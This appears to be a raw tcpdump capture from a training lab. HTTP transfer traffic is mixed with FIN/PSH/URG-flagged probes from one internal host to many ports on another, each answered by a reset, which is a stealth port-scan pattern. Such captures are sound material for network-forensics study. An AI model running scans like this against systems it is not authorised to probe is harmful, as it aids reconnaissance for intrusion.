1 (6), length 40)
2 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.20221: Flags [FPU], cksum 0x8898 (correct), seq 3180585248, win 1024, urg 0, length 0
300:43:01.227616 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
4 ip-10-10-200-226.eu-west-1.compute.internal.20221 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0x8cac (correct), seq 0, ack 3180585249, win 0, length 0
500:43:01.240956 IP (tos 0x0, ttl 64, id 24641, offset 0, flags [DF], proto TCP (6), length 68)
6 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x1a81 (correct), seq 10828:10844, ack 25919214, win 6347, options [nop,nop,TS val 3431983964 ecr 997087387], length 16: HTTP
700:43:01.241094 IP (tos 0x0, ttl 64, id 24447, offset 0, flags [DF], proto TCP (6), length 52)
8 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x2ec6), seq 25919214, ack 10844, win 482, options [nop,nop,TS val 997087424 ecr 3431983964], length 0
900:43:01.264574 IP (tos 0x0, ttl 64, id 24642, offset 0, flags [DF], proto TCP (6), length 68)
10 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc068 (correct), seq 10844:10860, ack 25919214, win 6347, options [nop,nop,TS val 3431983988 ecr 997087424], length 16: HTTP
1100:43:01.264692 IP (tos 0x0, ttl 64, id 24448, offset 0, flags [DF], proto TCP (6), length 52)
12 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x2e86), seq 25919214, ack 10860, win 482, options [nop,nop,TS val 997087448 ecr 3431983988], length 0
1300:43:01.277428 IP (tos 0x0, ttl 64, id 24449, offset 0, flags [DF], proto TCP (6), length 62695)
14 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x0198), seq 25919214:25981857, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 62643: HTTP
1500:43:01.277641 IP (tos 0x0, ttl 64, id 24456, offset 0, flags [DF], proto TCP (6), length 2896)
16 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xc437), seq 25981857:25984701, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 2844: HTTP
1700:43:01.277861 IP (tos 0x0, ttl 64, id 24643, offset 0, flags [DF], proto TCP (6), length 52)
18 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2413 (correct), seq 10860, ack 25981857, win 6023, options [nop,nop,TS val 3431984001 ecr 997087461], length 0
1900:43:01.278729 IP (tos 0x0, ttl 64, id 24457, offset 0, flags [DF], proto TCP (6), length 49808)
20 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6d6c (incorrect -> 0xdba3), seq 25984701:26034457, ack 10860, win 482, options [nop,nop,TS val 997087462 ecr 3431984001], length 49756: HTTP
2100:43:01.279044 IP (tos 0x0, ttl 64, id 24644, offset 0, flags [DF], proto TCP (6), length 52)
22 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x8c8d (correct), seq 10860, ack 26020497, win 6171, options [nop,nop,TS val 3431984002 ecr 997087461], length 0
2300:43:01.279178 IP (tos 0x0, ttl 64, id 24645, offset 0, flags [DF], proto TCP (6), length 52)
24 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x5654 (correct), seq 10860, ack 26034457, win 6091, options [nop,nop,TS val 3431984002 ecr 997087462], length 0
2500:43:01.300692 IP (tos 0x0, ttl 64, id 24646, offset 0, flags [DF], proto TCP (6), length 68)
26 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x162d (correct), seq 10860:10876, ack 26034457, win 6347, options [nop,nop,TS val 3431984024 ecr 997087462], length 16: HTTP
2700:43:01.307395 IP (tos 0x0, ttl 43, id 20042, offset 0, flags [none], proto TCP (6), length 40)
28 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.50800: Flags [FPU], cksum 0x1124 (correct), seq 3180519713, win 1024, urg 0, length 0
2900:43:01.307809 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
30 ip-10-10-200-226.eu-west-1.compute.internal.50800 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0x1538 (correct), seq 0, ack 3180519714, win 0, length 0
3100:43:01.340331 IP (tos 0x0, ttl 64, id 24463, offset 0, flags [DF], proto TCP (6), length 62695)
32 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x8784), seq 26034457:26097100, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 62643: HTTP
3300:43:01.340512 IP (tos 0x0, ttl 64, id 24470, offset 0, flags [DF], proto TCP (6), length 2896)
34 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe78e), seq 26097100:26099944, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 2844: HTTP
3500:43:01.340700 IP (tos 0x0, ttl 64, id 24647, offset 0, flags [DF], proto TCP (6), length 52)
36 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6158 (correct), seq 10876, ack 26097100, win 6023, options [nop,nop,TS val 3431984064 ecr 997087524], length 0
3700:43:01.341746 IP (tos 0x0, ttl 64, id 24471, offset 0, flags [DF], proto TCP (6), length 57493)
38 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8b71 (incorrect -> 0xb438), seq 26099944:26157385, ack 10876, win 482, options [nop,nop,TS val 997087525 ecr 3431984064], length 57441: HTTP
3900:43:01.342068 IP (tos 0x0, ttl 64, id 24648, offset 0, flags [DF], proto TCP (6), length 52)
40 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x75b9 (correct), seq 10876, ack 26157385, win 6055, options [nop,nop,TS val 3431984065 ecr 997087524], length 0
4100:43:01.350522 IP (tos 0x0, ttl 64, id 24649, offset 0, flags [DF], proto TCP (6), length 68)
42 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xcc87 (correct), seq 10876:10892, ack 26157385, win 6347, options [nop,nop,TS val 3431984074 ecr 997087524], length 16: HTTP
4300:43:01.387559 IP (tos 0x0, ttl 52, id 44283, offset 0, flags [none], proto TCP (6), length 40)
44 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd368 (correct), seq 3180585248, win 1024, urg 0, length 0
4500:43:01.388017 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
46 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd77c (correct), seq 0, ack 3180585249, win 0, length 0
4700:43:01.391305 IP (tos 0x0, ttl 64, id 24478, offset 0, flags [DF], proto TCP (6), length 52)
48 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8b32), seq 26157385, ack 10892, win 482, options [nop,nop,TS val 997087575 ecr 3431984074], length 0
4900:43:01.416224 IP (tos 0x0, ttl 64, id 24650, offset 0, flags [DF], proto TCP (6), length 68)
50 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x157a (correct), seq 10892:10908, ack 26157385, win 6347, options [nop,nop,TS val 3431984139 ecr 997087575], length 16: HTTP
5100:43:01.416392 IP (tos 0x0, ttl 64, id 24479, offset 0, flags [DF], proto TCP (6), length 52)
52 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8ac8), seq 26157385, ack 10908, win 482, options [nop,nop,TS val 997087600 ecr 3431984139], length 0
5300:43:01.447462 IP (tos 0x0, ttl 64, id 24480, offset 0, flags [DF], proto TCP (6), length 62695)
54 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x5330), seq 26157385:26220028, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 62643: HTTP
5500:43:01.447640 IP (tos 0x0, ttl 64, id 24487, offset 0, flags [DF], proto TCP (6), length 2896)
56 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0x0eb5), seq 26220028:26222872, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 2844: HTTP
5700:43:01.447812 IP (tos 0x0, ttl 64, id 24651, offset 0, flags [DF], proto TCP (6), length 52)
58 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x0b41 (correct), seq 10908, ack 26184232, win 6219, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
5900:43:01.447832 IP (tos 0x0, ttl 64, id 24652, offset 0, flags [DF], proto TCP (6), length 52)
60 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x7524 (correct), seq 10908, ack 26222872, win 6007, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
6100:43:01.448819 IP (tos 0x0, ttl 64, id 24488, offset 0, flags [DF], proto TCP (6), length 53862)
62 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7d42 (incorrect -> 0x3270), seq 26222872:26276682, ack 10908, win 482, options [nop,nop,TS val 997087632 ecr 3431984171], length 53810: HTTP
6300:43:01.449091 IP (tos 0x0, ttl 64, id 24653, offset 0, flags [DF], proto TCP (6), length 52)
64 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2e34 (correct), seq 10908, ack 26240770, win 6267, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
6500:43:01.449118 IP (tos 0x0, ttl 64, id 24654, offset 0, flags [DF], proto TCP (6), length 52)
66 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xa2b1 (correct), seq 10908, ack 26276682, win 6069, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
6700:43:01.454009 IP (tos 0x0, ttl 64, id 24655, offset 0, flags [DF], proto TCP (6), length 68)
68 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x264c (correct), seq 10908:10924, ack 26276682, win 6347, options [nop,nop,TS val 3431984177 ecr 997087632], length 16: HTTP
6900:43:01.467754 IP (tos 0x0, ttl 41, id 34770, offset 0, flags [none], proto TCP (6), length 40)
70 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.2041: Flags [FPU], cksum 0xcf9c (correct), seq 3180585248, win 1024, urg 0, length 0
7100:43:01.468111 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
72 ip-10-10-200-226.eu-west-1.compute.internal.2041 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd3b0 (correct), seq 0, ack 3180585249, win 0, length 0
7300:43:01.492453 IP (tos 0x0, ttl 64, id 24656, offset 0, flags [DF], proto TCP (6), length 68)
74 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x9b2a (correct), seq 10924:10940, ack 26276682, win 6347, options [nop,nop,TS val 3431984216 ecr 997087632], length 16: HTTP
7500:43:01.492496 IP (tos 0x0, ttl 64, id 24495, offset 0, flags [DF], proto TCP (6), length 52)
76 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xb833), seq 26276682, ack 10940, win 482, options [nop,nop,TS val 997087676 ecr 3431984177], length 0
7700:43:01.525524 IP (tos 0x0, ttl 64, id 24496, offset 0, flags [DF], proto TCP (6), length 62695)
78 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xec98), seq 26276682:26339325, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 62643: HTTP
7900:43:01.525721 IP (tos 0x0, ttl 64, id 24503, offset 0, flags [DF], proto TCP (6), length 2896)
80 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd146), seq 26339325:26342169, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 2844: HTTP
8100:43:01.525900 IP (tos 0x0, ttl 64, id 24657, offset 0, flags [DF], proto TCP (6), length 52)
82 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xad71 (correct), seq 10940, ack 26339325, win 6023, options [nop,nop,TS val 3431984249 ecr 997087709], length 0
8300:43:01.526608 IP (tos 0x0, ttl 64, id 24504, offset 0, flags [DF], proto TCP (6), length 49093)
84 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6aa1 (incorrect -> 0x1828), seq 26342169:26391210, ack 10940, win 482, options [nop,nop,TS val 997087710 ecr 3431984249], length 49041: HTTP
8500:43:01.526937 IP (tos 0x0, ttl 64, id 24658, offset 0, flags [DF], proto TCP (6), length 52)
86 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xf326 (correct), seq 10940, ack 26386914, win 6123, options [nop,nop,TS val 3431984250 ecr 997087709], length 0
8700:43:01.530054 IP (tos 0x0, ttl 64, id 24659, offset 0, flags [DF], proto TCP (6), length 68)
88 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0e84 (correct), seq 10940:10956, ack 26391210, win 6347, options [nop,nop,TS val 3431984253 ecr 997087710], length 16: HTTP
8900:43:01.547948 IP (tos 0x0, ttl 53, id 48049, offset 0, flags [none], proto TCP (6), length 40)
90 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd367 (correct), seq 3180519713, win 1024, urg 0, length 0
9100:43:01.548349 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
92 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0xd77b (correct), seq 0, ack 3180519714, win 0, length 0
9300:43:01.571378 IP (tos 0x0, ttl 64, id 24510, offset 0, flags [DF], proto TCP (6), length 52)
94 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf826), seq 26391210, ack 10956, win 482, options [nop,nop,TS val 997087755 ecr 3431984253], length 0
9500:43:01.588390 IP (tos 0x0, ttl 64, id 24660, offset 0, flags [DF], proto TCP (6), length 68)
96 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x5a42 (correct), seq 10956:10972, ack 26391210, win 6347, options [nop,nop,TS val 3431984311 ecr 997087755], length 16: HTTP
9700:43:01.588572 IP (tos 0x0, ttl 64, id 24511, offset 0, flags [DF], proto TCP (6), length 52)
98 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf7cb), seq 26391210, ack 10972, win 482, options [nop,nop,TS val 997087772 ecr 3431984311], length 0
9900:43:01.620113 IP (tos 0x0, ttl 64, id 24512, offset 0, flags [DF], proto TCP (6), length 62695)
100 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x95ad), seq 26391210:26453853, ack 10972, win 482, options [nop,nop,TS val 997087803 ecr 3431984311], length 62643: HTTP
10100:43:01.620337 IP (tos 0x0, ttl 64, id 24519, offset 0, flags [DF], proto TCP (6), length 2896)
102 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xb171), seq 26453853:26456697, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984311], length 2844: HTTP
10300:43:01.620538 IP (tos 0x0, ttl 64, id 24661, offset 0, flags [DF], proto TCP (6), length 52)
104 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xed32 (correct), seq 10972, ack 26453853, win 6023, options [nop,nop,TS val 3431984344 ecr 997087803], length 0
10500:43:01.621180 IP (tos 0x0, ttl 64, id 24520, offset 0, flags [DF], proto TCP (6), length 51025)
106 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x722d (incorrect -> 0x1091), seq 26456697:26507670, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984344], length 50973: HTTP
10700:43:01.621638 IP (tos 0x0, ttl 64, id 24662, offset 0, flags [DF], proto TCP (6), length 52)
108 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xbdfb (correct), seq 10972, ack 26465646, win 6315, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
10900:43:01.621654 IP (tos 0x0, ttl 64, id 24663, offset 0, flags [DF], proto TCP (6), length 52)
110 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x1ab3 (correct), seq 10972, ack 26507670, win 6091, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
11100:43:01.624279 IP (tos 0x0, ttl 64, id 24664, offset 0, flags [DF], proto TCP (6), length 68)
112 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0234 (correct), seq 10972:10988, ack 26507670, win 6347, options [nop,nop,TS val 3431984347 ecr 997087804], length 16: HTTP
11300:43:01.628148 IP (tos 0x0, ttl 58, id 3834, offset 0, flags [none], proto TCP (6), length 40)
114 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.50002: Flags [FPU], cksum 0x1443 (correct), seq 3180585248, win 1024, urg 0, length 0
11500:43:01.628589 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
116 ip-10-10-200-226.eu-west-1.compute.internal.50002 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0x1857 (correct), seq 0, ack 3180585249, win 0, length 0
11700:43:01.667290 IP (tos 0x0, ttl 64, id 24526, offset 0, flags [DF], proto TCP (6), length 52)
118 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x305b), seq 26507670, ack 10988, win 482, options [nop,nop,TS val 997087851 ecr 3431984347], length 0
11900:43:01.673072 IP (tos 0x0, ttl 64, id 24665, offset 0, flags [DF], proto TCP (6), length 68)
120 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x80d0 (correct), seq 10988:11004, ack 26507670, win 6347, options [nop,nop,TS val 3431984396 ecr 997087851], length 16: HTTP
12100:43:01.673229 IP (tos 0x0, ttl 64, id 24527, offset 0, flags [DF], proto TCP (6), length 52)
122 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x3014), seq 26507670, ack 11004, win 482, options [nop,nop,TS val 997087857 ecr 3431984396], length 0
12300:43:01.693950 IP (tos 0x0, ttl 64, id 24528, offset 0, flags [DF], proto TCP (6), length 62695)
124 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xa00a), seq 26507670:26570313, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 62643: HTTP
12500:43:01.694174 IP (tos 0x0, ttl 64, id 24535, offset 0, flags [DF], proto TCP (6), length 2896)
126 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd4cf), seq 26570313:26573157, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 2844: HTTP
12700:43:01.694314 IP (tos 0x0, ttl 64, id 24666, offset 0, flags [DF], proto TCP (6), length 52)
128 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd367 (correct), seq 11004, ack 26525568, win 6267, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
12900:43:01.694357 IP (tos 0x0, ttl 64, id 24667, offset 0, flags [DF], proto TCP (6), length 52)
130 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2592 (correct), seq 11004, ack 26570313, win 6023, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
13100:43:01.695237 IP (tos 0x0, ttl 64, id 24536, offset 0, flags [DF], proto TCP (6), length 56372)
132 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8710 (incorrect -> 0xb84e), seq 26573157:26629477, ack 11004, win 482, options [nop,nop,TS val 997087879 ecr 3431984417], length 56320: HTTP
13300:43:01.695565 IP (tos 0x0, ttl 64, id 24668, offset 0, flags [DF], proto TCP (6), length 52)
134 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd395 (correct), seq 11004, ack 26591055, win 6267, options [nop,nop,TS val 3431984419 ecr 997087877], length 0
13500:43:01.695663 IP (tos 0x0, ttl 64, id 24669, offset 0, flags [DF], proto TCP (6), length 52)
136 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x3e51 (correct), seq 11004, ack 26629477, win 6055, options [nop,nop,TS val 3431984419 ecr 997087879], length 0
13700:43:01.704028 IP (tos 0x0, ttl 64, id 24670, offset 0, flags [DF], proto TCP (6), length 68)
138 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x8f6b (correct), seq 11004:11020, ack 26629477, win 6347, options [nop,nop,TS val 3431984427 ecr 997087879], length 16: HTTP
13900:43:01.708350 IP (tos 0x0, ttl 44, id 26586, offset 0, flags [none], proto TCP (6), length 40)
140 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.3221: Flags [FPU], cksum 0xcb00 (correct), seq 3180585248, win 1024, urg 0, length 0
14100:43:01.708843 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
142 ip-10-10-200-226.eu-west-1.compute.internal.3221 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xcf14 (correct), seq 0, ack 3180585249, win 0, length 0
14300:43:01.738530 IP (tos 0x0, ttl 64, id 24671, offset 0, flags [DF], proto TCP (6), length 70)
144 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0d86 (correct), seq 11020:11038, ack 26629477, win 6347, options [nop,nop,TS val 3431984462 ecr 997087879], length 18: HTTP
14500:43:01.738578 IP (tos 0x0, ttl 64, id 24543, offset 0, flags [DF], proto TCP (6), length 52)
146 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x53c1), seq 26629477, ack 11038, win 482, options [nop,nop,TS val 997087922 ecr 3431984427], length 0
14700:43:01.763935 IP (tos 0x0, ttl 64, id 24672, offset 0, flags [DF], proto TCP (6), length 68)
148 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xfe5e (correct), seq 11038:11054, ack 26629477, win 6347, options [nop,nop,TS val 3431984487 ecr 997087922], length 16: HTTP
14900:43:01.788549 IP (tos 0x0, ttl 50, id 61856, offset 0, flags [none], proto TCP (6), length 40)
150 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.5800: Flags [FPU], cksum 0xc0ed (correct), seq 3180585248, win 1024, urg 0, length 0
15100:43:01.789163 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
152 ip-10-10-200-226.eu-west-1.compute.internal.5800 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xc501 (correct), seq 0, ack 3180585249, win 0, length 0
15300:43:01.798617 IP (tos 0x0, ttl 64, id 24673, offset 0, flags [DF], proto TCP (6), length 68)
154 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc159 (correct), seq 11054:11070, ack 26629477, win 6347, options [nop,nop,TS val 3431984522 ecr 997087922], length 16: HTTP
15500:43:01.798659 IP (tos 0x0, ttl 64, id 24544, offset 0, flags [DF], proto TCP (6), length 52)
156 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x5329), seq 26629477, ack 11070, win 482, options [nop,nop,TS val 997087982 ecr 3431984487], length 0
15700:43:01.806357 IP (tos 0x0, ttl 64, id 24545, offset 0, flags [DF], proto TCP (6), length 62695)
158 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x4ffe), seq 26629477:26692120, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 62643: HTTP
15900:43:01.806595 IP (tos 0x0, ttl 64, id 24552, offset 0, flags [DF], proto TCP (6), length 2896)
160 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xfc4f), seq 26692120:26694964, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 2844: HTTP
16100:43:01.806779 IP (tos 0x0, ttl 64, id 24674, offset 0, flags [DF], proto TCP (6), length 52)
162 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x48a1 (correct), seq 11070, ack 26692120, win 6019, options [nop,nop,TS val 3431984530 ecr 997087990], length 0
16300:43:01.808183 IP (tos 0x0, ttl 64, id 24553, offset 0, flags [DF], proto TCP (6), length 52618)
164 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7866 (incorrect -> 0x7032), seq 26694964:26747530, ack 11070, win 482, options [nop,nop,TS val 997087991 ecr 3431984530], length 52566: HTTP
16500:43:01.808500 IP (tos 0x0, ttl 64, id 24675, offset 0, flags [DF], proto TCP (6), length 52)
166 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe4 (correct), seq 11070, ack 26747530, win 6091, options [nop,nop,TS val 3431984532 ecr 997087990], length 0
16700:43:01.838902 IP (tos 0x0, ttl 64, id 24676, offset 0, flags [DF], proto TCP (6), length 68)
